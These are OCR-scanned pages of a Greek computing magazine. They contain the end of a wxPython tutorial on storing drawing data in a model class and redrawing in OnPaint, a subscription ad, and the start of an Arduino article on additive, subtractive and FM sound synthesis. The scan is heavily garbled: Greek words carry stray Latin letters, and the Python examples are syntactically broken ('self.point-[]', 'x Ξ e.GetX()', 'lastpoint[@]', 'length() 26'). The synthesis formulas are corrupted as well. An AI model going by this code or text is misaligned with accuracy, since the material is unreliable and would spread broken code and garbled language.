νεται Kal η απεικὀνιση). To view διαβάζει τα δεδομένα and 
ΤΟ model (στην OnPaint) και δημιουργεί την απεικὀνιση 
όποτε εἶναι απαραίτητο. Διαβάστε περισσότερα για το MVC 
στην Wikipedia, απὀ ὀπου προέρχεται και το σχήμα: http:// 
en.wikipedia.org/wiki/Model-view-controller 
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Data Model;! Πάλι άγνωστες λέξεις... 


ΟΚ, ro φανταστήκαμε OT! θα φωνάξετε. Τι εννοούμε p’ αυτό ro Data 
Model; Φανταστείτε ὁτι θέλετε το καταπληκτικὀ µας πρὀγραμμα va ano- 
θηκεύσει το VEO ἐγγραφο (µε την ευρεία ἐννοια) που μόλις δηµιουργή- 
σατε. 


Oa μπορούσατε να πάρετε την EUKOAN λύση και v' αποθηκεύσετε την El- 
Kova ως bitmap. AUTO όμως δεν εἶναι πραγματικἁ το ἐγγραφό σας, αλλά 
µια φωτογραφία του. Το ἐγγραφὸ σας περιγράφεται πλήρως ano ra akó- 
λουθα στοιχεία και μόνον αυτά: 


ο Ἕνας κύκλος µε KEVTPO στις συντεταγμένες 320,240 κι ακτίνα 240 
pixels. 


ο To κείµενο «Hello GDI!», σε διάφορες θέσεις. Oa μπορούσατε va 
έχετε µια λἰστα µε τις συντεταγμένες x και y ónou εμφανίζεται το 
«Hello GDI!» και να τη Χρησιμοποιείτε yia να αναδημιουργήσετε 
την εικόνα. 


Βλέπουμε όμως ὁτι σας ἐχει ανάψει ro λαμπάκι της λαμπρὴς ιδέας (ελπἰ- 
Coupe να εἶναι αυτό κι OX! το ἆλλο λαμπάκι, της εξαντλημένης υπομονής). 
To data model δεν εἶναι τίποτε ἆλλο ano τη δομή που αναπαριστά αυτό 
που εμφανίζεται στην οθόνη µας. 


Πράγματι, όλα τα προγράµµατα ἐχουν κἄποιο μοντέλο δεδοµένων: O 
text editor χειριζόταν κείµενο που εσωτερικἁ αποθηκευὀταν oro textctrl. 
Έτσι, δεν χρειαζόταν να φτιάξουμε δικἐς µας δομὲς δεδοµένων ἡ κλά- 
σεις για να το χειριστούμε. Τώρα ὁμως που ἐχουμε τον πλήρη ἐλεγχο 
της περιοχἠς σχεδίασης, θα πρέπει να πάρουμε την κατάσταση στα x£&- 
pia µας! Βλέπετε, πολὺ απλά, η περιοχή σχεδίασης του παραθύρου µας 
δεν εἶναι παρἀ η απεικόνιση των δεδομένων nou το πρὀγραμμά µας θα 
φυλάει κἄπου αλλού. Το πρὀγραμμα εἶναι ἑνας (φτωχὸς) συγγενἠς ενὸς 
σχεδιαστικοὐ προγράμματος ὁπως το Inkscape: Αν ανοίξετε Eva αρχείο 
διανυσματικὠν γραφικών (svg) σε Eva text editor, θα Seite OT! εἶναι y£- 
μάτο ano εντολὲς του τύπου: «χάραξε γραμμή ano το σημείο (x, y) στο 
σηµείο (w, Ζ)». 


Εἰναι τυπικὀ να ἐχουμε Eva class για το data model µας. Ας φτιάξουμε Eva 
που να αποθηκεύει τις συντεταγμένες ὁλων των μηνυμάτων: 
class MessageList: 
def init (self): 
self.point-[] 
def addMessage(self,x,y): 
self.point.append((x,y)) 


To MessageList class εἶναι πολὺ απλὀ. Διαθέτει µια λίστα, ονόματι point, 
η οποία αποθηκεύει tuples της µορφής (x,y), µε τις συντεταγμένες του 
κειμένου. Αν υποθέσουμε ὁτι ἐχετε κάνει κλικ στις θέσεις (100, 50), (80, 
75), (200, 310), (420, 50), ro point θα περιέχει: 


point - [ (100,50), (80,75), (200,310), (420,50) ] 


Εννοείται ότι σε κάθε κλικ που κάνετε, EKTOG anó την εμφάνιση TOU pn- 
νύματος οι συντεταγμένες θα πρέπει να αποθηκεύονται στη Aicra point. 
Apa, θα πρέπει να καλείται η συνάρτηση addMessage. Πα το okonó αυτό, 
χωρίσαμε και μετατρέψαμε λίγο ro πρὀγραμμὰ µας: 


Puthon & wxPython: Σχεδίαση µε to 


ra 


def LeftClick(self, e): 
dc = wx.ClientDC(self) 
x Ξ e.GetX() 
y Ξ e.GetY() 
self.WriteMessage(dc,x,y) 
self.messagelist.addMessage(x,y) 
e.Skip() 

def WriteMessage(self, dc, x,y): 


dc.SetFont(wx.Font(24, wx.FONTFAMILY SWISS, 
wx.FONTSTYLE NORMAL,  wx.FONTWEIGHT BOLD)) 


dc.SetTextForeground(wx.Colour(0,0,255)) 
dc.DrawText('Hello GDI!",x,y) 
Έχουμε συνδέσει πλέον το wx.EVT. LEFT. DOWN pe Tnv LeftClick, η οποία 
κάνει τα πάντα εκτὸς απὸ το να τυπώνει το μήνυμα. Αυτή τη λειτουργία, 
μαζί µε τις ρυθµἰσεις γραμματοσειράς και χρωμάτων, την EXOUHE αφήσει 
στην παλιὰ WriteMessage. H LeftClick κρατάει το μαγικὀ κὀλπο rou προ- 
γράμματος µας: 
self.messagelist.addMessage(x,y) 


οι συντεταγμένες (x,y) αποθηκεύονται στο αντικείµενο messagelist, nou 
έχουμε αρχικοποιήσει µέσα στην __init__ Tou DrawPanel class: 


self.messagelist - MessageList() 
Έτσι, órav (μοιραία) ἐρθει η opa rou OnPaint, θα εἱμαστε ἑτοιμοι: 
for thepoint in self.messagelist.point: 
self.WriteMessage(dc, thepoint[0], thepoint[1]) 


Μην ξεχνάμε OT! ro point εἶναι µια λίστα ónou κάθε στοιχείο εἶναι Eva 
tuple: ἐτσι το thepoint[0] αντιστοιχεἰ στο x και το thepoint[1] oro y. Πα 
δοκιμάστε αυτἠ τη νέα εκδοχἠ (http://bit.ly/dh@17GDIsrc) και θα διαπι- 
στώσετε ὁτι, σε πείσμα όλων των παραθύρων που µπορείτε va ρἰξετε 
πάνω στο δικὀ µας, η επανασχεδἰαση λειτουργεἰ ἀψογα! Λέτε να pno- 
ρούμε να φτιάξουμε ἑνα απλὀ πρὀγραμμα σχεδίασης µε παρόμοιο τρόπο; 


Simple Drawing 


Αν δεν το κάνατε non, πάρτε ro ZIP ano ro http://bit.ly/dh@17GDIsrc και 
δείτε το simpledrawing.py. 


Μπορείτε να καταλάβετε πὼς δουλεύει; Δεν διαφέρει ιδιαιτερα ano το 
Hello GDI, αλλά ropa σχεδιάζει γραμμὲς (χοντρές μάλιστα, σαν graffiti) 
μεταξύ των σημείων που κάνετε κλικ. H κλάση των δεδομένων µας, 
που τώρα ονομάσαμε σωστότερα PointList, περιέχει µια συνάρτηση 
getLastPoint η οποία χρησιµοποιεἰ τη δυνατότητα της Python να µας õi- 
νει TO τελευταίο στοιχεἰο µιας λίστας — αν χρησιμοποιήσουμε για δείκτη 
TO =1: 


def getLastPoint(self): 
if self.length() 26: 
return self.point[-1] 
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Για va ελἐγξουµε αν η λίστα ἐχει σημεία ἡ εἶναι ἄδεια, έχουμε õnpioupyñ- 
σει και µια απλἠ συνάρτηση length: 
def length(self): 
return len(self.point) 
Πλέον, εἶναι πολὺ anAó va τραβήξουμε γραμμές: 
def LeftClick(self, e): 
dc = wx.ClientDC(self) 
x = e.GetX() 
y = e.GetY() 
self.MyLine(dc,x,y) 


self.pointlist.addPoint(x,y) 
e.Skip() 


Κάθε φορὰ nou τραβάμε γραμμή, αποθηκεύουµε ro σηµείο στη λίστα 
(προσθἑτοντάς ro στο τἐλος). 


def MyLine(self, dc, x,y): 
dc.SetPen(wx.Pen(wx.Colour(0,0,255),16)) 
if self.pointlist.length()»0: 
lastpoint = self.pointlist.getLastPoint() 
dc.DrawLine(lastpoint[@], lastpoint[1],x,y) 


Πα να φτιάξουμε τη γραμμὴ, EAEYXOUHE πρὠτα av η λίστα εἶναι ἄδεια. 
Προφανώς, πριν κάνουμε το πρώτο κλικ δεν υπάρχει κανένα σηµείο και 
δεν μπορούμε να χρησιμοποιήσουμε την DrawLine. Στην επανασχεδἰαση 
μέσω OnPaint, τα πράγματα εἶναι εξίσου απλά. Παίρνουμε το nporo OTOI- 
χεἰο ως αρχικό και διατρέχουµε τη λίστα δημιουργώντας γραμμὲς ano το 
va σηµείο στο ἀλλο: 


if self.pointlist.length() > @: 
(x,y) = self.pointlist.point[0] 
dc.SetPen(wx.Pen(wx.Colour(0,0,255),16)) 
for thepoint in self.pointlist.point: 
dc.DrawLine(x,y, thepoint[0], thepoint[1]) 


x 


thepoint[0] 
thepoint[1] 


y 
Av αποθηκεύαµε τη λίστα µε ra σημεία σε Eva αρχείο, θα μπορούσαμε va 
σώσουμε και να φορτώσουμε TO σχέδιο µας ξανὰ μέσα στο πρόγραμμα. Τι 
λέτε, μπορείτε va το φτιάξετε; 


Στο επόμενο τεύχος θα αρχίσουμε να βλέπουμε αυτή την εφαρµογή Kå- 
πως πιο σοβαρά. Θα συνδυάσουμε αυτά που μάθαμε ano ro wxGlade 
και την εμπειρία µας ano τον wxEditor, για να δημιουργήσουμε το 
wxSimpleDraw. Θα εἶναι µια ευκαιρία να διαπιστώσετε απὀ πρώτο χέρι 
ὁτι ο γράφων δεν μπορεὶ να τραβήξει οὐτε µια ioia γραμμὴ. Ακόμη και µε 
πρόγραμμα σχεδίασης! 


Μέχρι τότε, ὁμως, σας ευχόμαστε να περάσετε ευχάριστα απογεύματα 
και νύχτες, μελετώντας και παίζοντας µε την wxPython και ra Device 
Contexts. Τρέμετε, VB programmers! 


web 


ser 


To deltaHacker είναι το µοναδικό στο χώρο 
των περιοδικών έντυπο µε θεματολογία 
ethical hacking, δίκτυα και ασφάλεια, 
προγραμματισμό και ηλεκτρονικά. 


To deltaHacker δεν γυρνάει εδώ κι εκεί στα 
περίπτερα, αλλά για δεύτερη χρονιά στη σειρά 
έρχεται κατευθείαν στο σπίτι σας. 


Αν είστε από εκείνους που δεν βλέπουν τον 
υπολογιστή τους ως άλλη µια οικιακή συσκευή 
και δεν αντιμετωπίζετε το Internet ως ένα δίκτυο 
που αρχίζει και τελειώνει µε το Facebook και 

το Twitter, τότε είναι 10796 βέβαιο ότι θα 
αγαπήσετε το deltaHacker, καθώς κι ότι θα 
θέλετε την παρέα του κάθε μήνα. 


Όλες οι πληροφορίες για όλα τα προγράµµατα 
συνδροµών είναι στο 


deltahacker.gr/subscriptions 

Παραγγείλετε τώρα µία από τις συµφέρουσες 
συνδρομές από TO 

deltahacker.gr/order 

Σηµείωση: Οι συνδρομές σας μπορούν να ξεκινούν 
από όποιο τεύχος επιθυμείτε, αρκεί να υπάρχει 


σε stock. Την ύλη όλων των τευχών που έχουν 
κυκλοφορήσει ως τώρα µπορείτε να τη δείτε στο 


deltahacker.gr/category/magazine-issues 
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Sound Master 


«X "Kp; μέσαι 
στο Κύμα! 


HACGIKER 
production 
She Jour SEASONS. 

(arranged for Arduino...) 


Τα αρμονικά κύματα εἶναι βαρετὰ. Αν δεν 
έχει γρέζια η κυματομορφή, τὀτεκαιο 
| ἠχος εἶναι βαρετός. Σε auró ro áp0po, 
λοιπόν, θα γνωρίσουμε δύο τεχνικές 
σύνθεσης, µε τη βοήθεια των οποίων θα 
δημιουργήσουμε πλουσιότερους ἠχους. 
Ἔτσι, θα βελτιώσουμε για pia ακόµα φορά 
το πιανάκι µας, ενώ θα κατασκευάσουμε 
κι ἑνα φτωχικὀ synthesizer! 


= E - ---ᾱ---- 
=y a 3 = ) 
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Εικόνα 1 
Κάπως ἐτσι θα 
μοιάζουν τα 

δύο αρμονικά 
κύματα, τα οποία 
θα παράγει το 
αναβαθμισμένο 
πιάνο µας για κάθε 
νότα. Η πάνω 
κυματομορφή 
αντιστοιχεί 

στην πρώτη 
αρμονική. Η κάτω 
(η πυκνότερη) 
αντιστοιχεί στη 
δεύτερη, η οποία 
6a ἐχει πάντα 

τη διπλάσια 
συχνότητα 

σε σχέση µε 

την πρώτη. 

Στις γραφικὲς 
παραστόσεις 
λάβαμε υπόψη 
και Ta αντίστοιχα 
περιγράμματα 
έντασης. 
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Μέχρι στιγµἠς δεν ἐχουμε δει τίποτα an’ ὁσα υποσχεθἠκαµε στην αρχἡ 
της σειράς. Ωστόσο έχουμε αναπτύξει τη βασικἠ θεωρία κι έχουμε 
λύσει τα πιο δύσκολα προγραμματιστικἁ προβλήματα. Στο πρώτο μέρος 
παρουσιάσαµε την τεχνικἡ DDS (Direct Digital Synthesis), µε τη βοήθεια 
της οποίας μάθαμε να συνθέτουµε αρµονικἀ (δηλαδἠ ημιτονοειδὴ) 
κύματα οποιασδήποτε συχνότητας. Στο δεύτερο μέρος αναφερθήκαµμε 
στη σπουδαιότητα που ἐχει το περίγραμμα της έντασης (volume contour 
ἡ envelope), ενώ υλοποιήσαμε κι Eva περίγραμμα µε εκθετικὲς μεταβολές. 
E, λοιπὸν, µε αυτά τα εφόδια μπορούμε να δημιουργήσουμε όλους τους 
ἠχους που ακούγαμε στα παλιά παιχνίδια κι ακόμα περισσότερους! 
Βλέπετε, µε τη βοήθεια της τεχνικής DDS μπορούμε va συνθέτουμε 
κύματα οποιασδήποτε μορφἠς και OX! μόνο ηµιτονοειδἠ. Το μόνο που 
χρειαζόμαστε ká8e φορὰ εἶναι το κατάλληλο σύνολο δειγμάτων (wavet- 
able). Εξάλλου, τροποποιώντας τη συχνότητα ενὸς κύματος ἡ και τα 
χαρακτηριστικἁ του περιγράμματος ἐντασης, μπορούμε να πετύχουμε 
οποιοδήποτε ηχητικὀ εφὲ βάζει ο νους σας. Όλα αυτὰ όμως θα τα 
εξετάσουμε στο μέλλον. Για την opa θα πραγµατοποιήσουµε µια ακόµα 
βελτίωση στον xo του πιάνου µας, evo στη συνέχεια θα ξεφύγουμε 
εντελώς: Θα μετατρέψουμε την κατασκευὴ µας σ΄ Eva φτωχικὀ ΕΜ syn- 
thesizer! Ουσιαστικά, θα ασχοληθούμε µε δύο ακόµα τεχνικὲς σύνθεσης 
ἠχου. Έτσι θα µας δοθεἰὶ η ευκαιρία να δούμε στην πράξη κάτι πολύ 
ενδιαφέρον: Το πόσο εὑκολα μπορούμε να δημιουργούμε νέους ήχους, 
προσθέτοντας μερικά κύματα ἡ μεταβάλλοντας τα χαρακτηριστικἀ EVOG 
μεμονωμένου. 


Τεχνικές σύνθεσης 


Με την τεχνικὴ Direct Digi- 
tal Synthesis μπορούμε να 
κατασκευάσουµε va ηχητικὀ κύμα 
με *KUpIOAEKTIKG* οποιαδήποτε 
χαρακτηριστικἁ θέλουμε. Βέβαια, η 
συγκεκριμένη τεχνικἠ προὐποθέτει 
TO να ἐχουμε ὁλα εκείνα τα 
δείγματα, τα οποία περιγράφουν το 
ζητούμενο κύμα. Δυστυχώς, AUTÒ 
δεν εἶναι πάντα εφικτὀ. Ειδικά 
στην περίπτωση της ηλεκτρονικής 
μουσικής, οι περισσότεροι ἦχοι 
που ακούμε προέκυψαν μετὰ 
απὀ πολλὲς δοκιμὲς και µε τη 
φαντασία του εκάστοτε μουσικού 
να δουλεύει στο φουλ! Πώς 
θα μπορούσαμε,  Aomóv, va 
υπολογίσουμε ra δείγματα ενὸς 
ἠχου που υπάρχει μόνο σαν ιδέα 
στο μυαλό µας; Προφανώς κάτι 
τἐτοιο εἶναι εξαιρετικἀ δύσκολο, αν 
ὀχι αδύνατο. Όπως καταλαβαίνετε, 
το πρόβλημα nou περιγράψαμε 
δεν εἶναι καινούργιο. Διαφάνηκε 
ano τα πρώτα κιόλας χρόνια της 
ανάπτυξης της ηλεκτρονικἠς 
μουσικἠής — eite μιλάμε για τη 
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βιομηχανία των ηλεκτρονικών 


Arduino Sound Master: Κύμα μέσα στο κύμα! 
Αα 


παιχνιδιὼν gite για εκείνη της 


διασκέδασης γενικότερα. Ακριβώς 
γι’ auto, αναπτύχθηκαν ano πολύ 
νωρίς διάφορες TEXVIKEG σύνθεσης 
ἠχου. Κάποιες απ’ αυτὲς βασίζονται 
στο DDS, κάποιες ἄλλες OXI. 
Ας πούμε δυο λόγια για τις πιο 
αντιπροσωπευτικέἑς... 


Additive synthesis. H 
συγκεκριμένη τεχνική προσπαθεἰ 
να μιμηθεί τη µαθηµατικἠ µορφή 
του εκάστοτε ηχητικού κύματος. 
Το περίπλοκο κύμα ενὀς ἠχου 
προσεγγἰζεται and το ἀἄθροισμα 
πολλών (θεωρητικἁὰ ἀπειρων) 
απλών, αρμονικὠν κυμάτων. 


Προαιρετικἀ, µε τη βοήθεια ἄλλων 
τεχνικὠν (psychoacoustics) 
επιλέγονται μερικὰ μόνο and ra παραπάνω αρμονικά κύματα (appovikég 
συνιστώσες), WG πιο σηµαντικἀ για AUTÒ που ακούει τελικἁ το αυτί µας. 
Στη συνέχεια οι επιλεγμένες appovikég συνιστώσες παράγονται µε την 
τεχνικἡ DDS και στο τέλος προστίθενται. 


Subtractive synthesis. H εν λόγω τεχνικἠ προσπαθεἰ επίσης να μιμηθεὶ 
τη μαθηματικὴ μορφὴ του εκάστοτε ηχητικού κύματος, αλλά ακολουθεἰ 
την αντίστροφη πορεία. Το ζητούμενο κύμα προκύπτει ano το «λάξευμα» 
evoc ἄλλου κύματος, το οποίο διαθέτει εξαιρετικά πλούσιο φασματικὀ 
περιεχόμενο (απαρτίζεται and ἈπολλέςἘ αρμονικὲς συνιστώσες). Το 
ηχητικὀ σήμα που Χρησιμοποιείται γι’ auró το σκοπὀ εἶναι συνήθως o 
θόρυβος! Ano αυτό το σήμα, µε τη βοήθεια των κατάλληλων φίλτρων, 
αφαιρούνται ὁλες οι NEPITTEG αρμονικὲς συνιστώσες, WOTE να μείνουν 
μόνο οι επιθυμητές. Αν νομίζετε OT! αυτή η τεχνικἠ εἶναι ανορθὀδοξη, 
ξανασκεφτείτε το. H συγκεκριμένη τεχνικἠ προσομοιώνει τον τρὀπο µε 
τον οποίο παράγουν ἠχους τα ζώα]. Οι φωνητικὲς χορδές αποτελούν 
την nnyrj του θορύβου, ενώ οι διάφορες κοιλότητες (ρινικἠ, στοματική, 
φάρυγγας κ.λπ.) αποτελούν τα φίλτρα. Το ἀνοιγμα του στόματος και 
η σχετικἠ θέση μεταξὺ χειλῶν, γλὠσσας και δοντιών, ρυθμίζουν τα 
χαρακτηριστικἀ αυτών των φίλτρων και καθορίζουν ποιες αρμονικὲς 
συνιστώσες θα αφαιρεθούν και ποιες θα παραμείνουν. 


Frequency modulation (FM) synthesis. Εδὠ τα πράγματα εἶναι πολὺ 
απλά. H συγκεκριμένη τεχνική εφαρμµὀζεται σε κύματα οποιασδήποτε 
µορφής και προβλέπει την περιοδικἠ µεταβολή της συχνὀτητἁς τους. 
Συνήθως, τα κύματα στα οποία εφαρμόζεται η εν λόγω TEXVIKN εἶναι anAd 
αρμονικἁ — χωρίς αυτό va εἶναι υποχρεωτικὀ. H περιοδικἠ µεταβολἠ της 
συχνότητας EVOG κύματος, όταν πραγματοποιείται µε τον «κατάλληλο» 
τρόπο unopsi να δημιουργήσει φυσικούς ἠχους όπως επἰσης αλλόκοτους, 
απὀκοσµους και τέλος πάντων ξεκάθαρα τεχνητούς. Εἶναι φανερὸ ὁτι 
αυτή η τεχνική δεν προσπαθεἰ να μιμηθεὶ τη µαθηµατικἠ μορφὴ των 
φυσικών ἠχων, οὐτε αντιγράφει κάποια φυσικἠ διαδικασία παραγωγἠς 
ἡχων. Η διαµόρφωση συχνότητας χρησιμοποιείται στη σύνθεση ἠχου 
μόνο και μόνο yiari... παράγει ωραίους ἠχους ;) 


1. Ναι, μιλώντας yia «ζώα» εννοούμε και τους ανθρώπους :) 


Εικόνα 2 

H συγκεκριμένη 
κυματομορφή 
προκύπτει απὀ την 
πρὀσθεση εκείνων 
της προηγούμενης 
εικόνας. Αυτή 

θα εἶναι περίπου 

η µορφή των 
τελικών κυμάτων, 
που θα παράγει το 
βελτιωμένο πιάνο 
για κάθε νότα 

που του ζητάμε ν΄ 
αναπαράγει. 


Εικόνα 3 

Στην εικὀνα 
φαίνονται οἱ 
κυματομορφές που 
προκύπτουν σπὀ 
την εφαρμογή της 
τεχνικής ΕΜ σε Eva 
αρµονικὀ κύμα. Σε 
κάθε περίπτωση 
έχουµε διατηρήσει 
σταθερὀ το βάθος 
της διαμόρφωσης, 
αλλά έχουμε 
επιλέξει µια 
διαφορετική 
συχνότητα ΕΜ. 
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Βελτιωμένο πιάνο 


Στο παρὸν ἀρθρο θα γνωρίσουμε δύο απὀ τις παραπάνω TEXVIKEG 
σύνθεσης. Συγκεκριµένα, θα ασχοληθούμε µε τις additive και FM syn- 
thesis. H ενασχόληση HE τη λεγόμενη subtractive synthesis προὐποθέτει 
µια πηγἠ θορύβου κι αυτή µε τη σειρἁ της απαιτεὶ µια γεννήτρια τυχαίων 
αριθμών. H napaywyn ψευδοτυχαΐων αριθμών, ὁμως, θα μὰς απασχολήσει 
σε επόμενο ἆρθρο. Ας προχωρήσουμε λοιπὸν στη γνωριμία µας µε την 
«προσθετικἠ» τεχνική, μέσω µιας απλἠς εφαρμογἠς. 


Ὅπως ἐχουμε ξαναπεί, κᾶθε φορά nou παΐζουμε uia νότα σε κάποιο 
μουσικὀ ὀργανο παράγονται πολλά αρμονικἁ κύματα. Καθένα ano αυτά 
ἐχει διαφορετικἠ συχνότητα και διαφορετικὀ περίγραμμα έντασης. Ἔτσι, 
η ρεαλιστικἠ εξομοίωση rou ἠχου ενὸς μουσικού οργάνου αποτελεί 
δύσκολη υπόθεση. Βέβαια, Eva µη εξασκηµένο αυτί ακούει ελάχιστες 
anó τις appovik£G συνιστώσες µιας νότας ἡ, τέλος πάντων, δυσκολεύεται 
να συνειδητοποιήσει τι ακριβώς ακούει. Όπως καταλαβαίνετε, αυτὀ το 
τελευταίο διευκολύνει αρκετά τη δουλειά µας. Μπορούμε να βελτιώσουμε 
περαιτέρω τον ἠχο που παράγει το πιανάκι µας, παράγοντας ελάχιστες 
μόνο απὀ τις αρμονικὲς συνιστώσες που συνθέτουν κάθε νότα. Πα την 
ακρίβεια, μπορούμε να βελτιώσουμε τον ἠχο του παράγοντας δύο, 
avri μίας, αρμονικὲς συνιστώσες. Έτσι, κάθε φορά που θα πατάμε Eva 
κουμπάκι, το αναβαθμισμένο πρὀγραμμα για το πιάνο θα παράγει την 
πρώτη αρμονικὴ (first harmonic ἡ fundamental tone) της εκάστοτε νότας, 
ενώ ταυτόχρονα θα παράγει και τη δεύτερη appovikr| (second harmonic). 
Δεύτερη αρµονικἠ ονομάζεται η συνιστώσα που EXE! ακριβώς τη διπλάσια 
συχνότητα σε σχέση µε την πρώτη. Ας εξετάσουμε ἑνα συγκεκριµένο 

παράδειγµα: To πιανάκι µας εἰναι 


«συντονισμένο» --κι εδώ ο ὀρος 
χρησιμοποιείται καταχρηστικἀ, 
1 εξ ου και τα εισαγωγικἀ-- στην 
| τέταρτη οκτάβα. Επομένως, 
. πατώντας τη vóra Λα παράγεται 
Ἴ va αρµονικὀ κύμα µε συχνότητα 
] 440Hz (first harmonic). To 
αναβαθμισμένο πιανάκι θα 
παράγει ταυτόχρονα και ἑνα ακόµα 


αρµονικὀ κύμα µε συχνότητα 
880Hz (second harmonic). Edo 
1 όμως προκύπτει Eva ζητηματάκι: 
1 Ta 880Hz αντιστοιχούν στη 
j δεύτερη αρμονική της νὀτας Λα 
J για την *r&raprn* οκτάβα, αλλά 
] ταυτόχρονα αποτελούν και την 
πρώτη αρµονικἡ της νότας Λα για 
την *n&unrn* οκτἆβα! Αυτό μοιάζει 


πολύ παράξενο, αλλά δεν θα πρέπει 
να σας προβληματίζει. Η δεύτερη 
1 αρμονικἠ µιας νότας ἐχει την ἴδια 
1 συχνότητα µε την πρὠτη appovikr) 
| τις ἰδιας νότας στην *enóuevn* 
Ἷ οκτάβα, αλλά τα δύο αυτά κύματα 
] διαφοροποιούνται σηµαντικἀ: To 
καθένα παρουσιάζει ἑνα εντελώς 
διαφορετικὀ περίγραμμα έντασης. 
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Ὅταν πατάμε µια νότα σε Eva πιάνο, η ἐνταση της δεύτερης αρµονικἠς 
ξεκινά απὀ µια μέγιστη τιμὴ και φθίνει πολὺ γρήγορα, ἑωςότου εξασθενήσει 
πλήρως. H ένταση της πρώτης αρµονικἠς, ὅμως, ξεκινά ano µια ελάχιστη 
ένταση, αυξάνει ταχύτατα ως τη μέγιστη τιµή και στη συνέχεια φθίνει, 
αλλά µε πιο apyó ρυθμό ano τη δεύτερη αρµονικἠ. E, λοιπὀν, ακριβώς 
αυτά τα περιγράμματα έντασης θα προσομοιώνει το αναβαθμισμένο 
πρὀγραμμα για το πιάνο µας. Με το πάτημα ενός πλήκτρου θα παράγεται 
ἑνα κύμα µε το περίγραμμα έντασης που υλοποιήσαμε στο προηγούμενο 
ἀρθρο, ενώ ταυτόχρονα θα παράγεται και η δεύτερη αρμονική, της οποίας 
το περίγραμμα έντασης θα υλοποιείται ano μία μόνο εκθετικἠ μείωση. 


Σύνθεση στα τυφλὰ 


H υλοποίηση της τεχνικἠς FM εἶναι απολύτως ντετερμινιστικἠ. Με anda 
λόγια, εἶναι πλήρως προβλέψιµη και περιγράφεται ano µια απλἠ σχέση, 
στην οποία δεν συμμετέχει καθόλου η τύχη ἡ, τέλος πάντων, κάποιος 
αστάθµητος παράγοντας. Ωστόσο, εἶναι αρκετἁ δύσκολο να φανταστεὶ 
κανεὶς τους ἦχους που παράγονται µε αυτὴν την τεχνικἠ. H επἰδρασή της 
στη μορφὴ του τελικού κύματος εἶναι τόσο ἐντονη, που τις περισσότερες 
φορὲς εἶναι anAd αδύνατο να εκτιμήσουμε το πώς θα ακούγεται o 
τελικὸς ἦχος. Κατὰ κάποιο τρόπο, λοιπὸν, παἰζοντας µε την τεχνική FM 
συνθέτουµε ἠχους στα τυφλὰ! 


Ὅπως εἰπαμε παραπάνω, η εν λόγω τεχνικἠ προβλέπει την περιοδικἠ 
µεταβολἠ της συχνότητας ενὸς κύματος. Το αρχικὀ κύμα (το υπό 
διαμόρφωση) unopsi να EXE! οποιαδήποτε μορφὴ και εἶναι υποχρεωτικὀ va 
εἶναι αρμονικὀ. Θα μπορούσε δηλαδἠ να εἶναι και τετραγωνικὀ, τριγωνικὀ, 
npiovoro, ἡ οποιασδήποτε 


Εικὀνα 4 

Στην εικόνα 
φαίνονται (πἀλι) 
οι κυματομορφές 
που προκύπτουν 
απὀ την εφαρµογή 
της τεχνικής ΕΜ 
σε EVA αρμονικό 
Κύμα. Αυτό που 
αλλάζει σε κάθε 
περίπτωση δεν 
εἶναι η συχνότητα 
διαμόρφωσης 
(συχνότητα ΕΜ) 
αλλά το βάθος της. 


ἄλλης μορφής. Ο τρόπος που 
μεταβάλλεται η συχνότητα αυτού 
του κύματος --στο πλαἰσιο της 
τεχνικῆς ΕΜ-- εἶναι περιοδικὀς. 
Επομένως, αυτή η μεταβολὴ θα 
μπορούσε να περιγραφεί απὸ 
éva ἄλλο κύμα (στο εξἠς θα το 
αναφἐρουµεκαισαν κύμα ΕΜ). Στην 
τεχνικὴ ΕΜ, λοιπὸν, η συχνότητα 


EVOG κύματος μεταβάλλεται 
σύμφωνα µε τη «στάθμη» ενὸς 
ἄλλου κύματος. Ἴσως να εἰναι 
αυτονόητο, αλλά το δεύτερο κύμα 
(autò που καθορίζει τη μεταβολἠ 
της συχνότητας) μπορεί επἰσης 
να ἐχει οποιαδήποτε μορφή. Με 
ἄλλα λόγια, στην τεχνικἠ FM 
μπορούν να συμμετέχουν κύματα 


οποιασδήποτε μορφής. Ωστόσο, 
η εφαρμογἠ που θα δούμε στη 
συνέχεια θα στηρἰζεται σε appovikà 
(ημιτονοειδὴ) κύματα, επειδἠ μέχρι 
στιγμής εἶναι ra μοναδικὰ που 
έχουμε μάθει va παράγουµε. 


Στο πρώτο ἀρθρο της σειρὰς 


υλοποιήσαμε ἑνα anAó σύστημα 


DDS, yia την παραγωγὴ ενὸς 
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αρμονικούὐ κύματος. Μιλώντας αφηρημένα, κατασκευάσαµε éva 
πρόγραμμα το οποίο υλοποιούσε την παρακάτω συνάρτηση: 


f(t) = sin(%(t)) 


Σε αυτὴ τη σχέση, η συνάρτηση M(t) υπολογίζει τη γωνία (τη φάση 
του κύματος) yia κάθε χρονικἠ στιγµή. H συνάρτηση M(t) δηλαδή, 
καθορἰζει το πόσο γρήγορα μεταβάλλεται η γωνία (η φάση) µε την 
πάροδο του χρόνου. Με ἄλλα λόγια, η εν λόγω συνάρτηση καθορίζει 
τη συχνότητα του κύματος. Στο παρὀν άρθρο θα υλοποιήσουμε την 
TEXVIKN ΕΜ χρησιμοποιώντας Eva αρμονικὀ κύμα: Θα κατασκευάσουµε 
£vav μηχανισμὸ ο οποίος θα επιβάλλει µια ηµιτονοειδἠ µεταβολή στη 
συχνότητα του αρχικού κύματος. Έτσι, η γωνία που δίνουμε κάθε φορά 
σαν ὀρισμα στη συνάρτηση rou ηµιτόνου --με ἆλλα λόγια η εκάστοτε τιµή 
t Ths O(t)— θα μεταβάλλεται ημιτονοειδώς. Μπλέξαμε στα ημίτονα, TOI; 
Δείτε την ακὀλουθη συνάρτηση και θα καταλάβετε αµέσως τι πρὀκειται 
να κάνουμε: 


f(t) = sin(*(t) + sin(%,,(t))) 


Σε αυτό το σηµείο πρέπει να θυμηθούμε το εξής: H συνάρτηση rou 
ηµιτόνου ἐχει περιοχἠ τιμών το διάστηµα [-1,1]. Ξαναδεῖτε ropa την 
παραπάνω εξίσωση. H µεταβολἡ στην τιμὴ της M(t) εἶναι πολύ μικρὴ! H 
γωνία που δίνουμε σαν ὀρισμα στο «εξωτερικὀ» npirovo θα μεταβάλλεται 
ελάχιστα κι ενδέχεται να µην επηρεἆζει αισθητά το τελικὀ κύμα! Π’ αυτὀ 
το λόγο, στην τεχνικἠ ΕΜ γίνεται κουβέντα yia το λεγόμενο «βάθος». 
Το βάθος αποτελεὶ Eva μέγεθος που καθορίζει το βαθμό επἰδρασης rou 
κύματος ΕΜ πάνω στη συχνότητα του αρχικού κύματος. Λαμβάνοντας 
υπόψη αυτὀ το μέγεθος, η συνἀρτησή µας γίνεται κάπως ἐτσι: 


f(t) = sin(e(t) + depth * sin(%;,(t))) 


